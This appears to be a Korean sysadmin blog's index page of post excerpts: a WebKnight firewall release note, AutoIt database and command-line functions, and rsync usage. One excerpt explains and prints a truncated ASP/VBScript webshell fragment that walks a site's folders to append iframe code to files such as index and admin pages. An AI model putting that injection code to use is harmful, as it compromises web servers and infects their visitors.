컴퓨터

    웹쉘을 이용한 iframe 코드를 추가원리

    웹쉘을 이용한 iframe 코드를 추가원리

    다음 구문은 Scripting.FileSystemObject 를 이용해서 하위폴더를 포함한 특정 디렉토리내의 특정패턴을 가진 파일명을 가진 파일을 기준으로 특정코드를 추가하는 스크립트 입니다. Set fs=Server.createObject("Scripting.FileSystemObject") Set fd=fs.GetFolder(s) Set fi=fd.Files Set sf=fd.SubFolders For Each f in fi rtn=f.path step_all rtn Next If sf.Count0 Then For Each l In sf sch l Next End If Sub step_all(agr) retVal=IsPattern("(\\|\/)(default|index|conn|admin|bbs|r..

    webknight 2.2

    웹방화벽 웹나이트(WebKnight)가 2.2 로 패치되어서 배포를 시작했습니다. 사이트내 설명 WebKnight 2.2 (Release date: 2008.09.02) This release is ready for IIS 7 and 64-bit. Fixed a few minor issues and extended scanning for SQL injection in the referrer, extended cookie scanning and certain XSS attacks. It is now also possible to monitor or block an IP address after an alert has been triggered. A new version of the config utilit..

    [ Autoit / MSSQL ] 데이터베이스를 사용하고자 할경우

    ; ------------------------------------------------------------------------------ ; ; AutoIt Version: 3.1.1++ ; Language: English ; Description: Functions for ODBC/SQL databases. ; ; ------------------------------------------------------------------------------ ; Retrieve registerered DSN resources, default type USER and SYSTEM Func _SQLGetDSN($s_DSNType="") Local Const $s_ODBCregUser = "HKEY_CUR..

    [ Autoit / CmdLine ] 커맨드라인을 입력받아 처리하는 함수의 일부입니다.

    Func _ParseCmdLine() Local $intCmdTotal = _GetThisArg(0) Local $intCmdNum = 1 Local $strCmdCode While $intCmdNum _ParseCmdLine Func _GetThisArg($_n) If $CmdLine[0] = 0 or $CmdLine[0] _GetThisArg

    Rsync 사용하기

    - 데이터를 가져올때 rsync -av 서버IP::SERVER6(rsyncd.conf에서 지정한명칭)/data(가져올내용) ./(현재디렉토리) 예) rsync.exe -av 서버IP::backup/inetpub/wwwroot /cygdrive/d/tmp 서버IP 를 가진서버에서 inetpub/wwwroot 디렉토리의 모든 파일을 현재서버의 d:\tmp 폴더에 저장하는 명령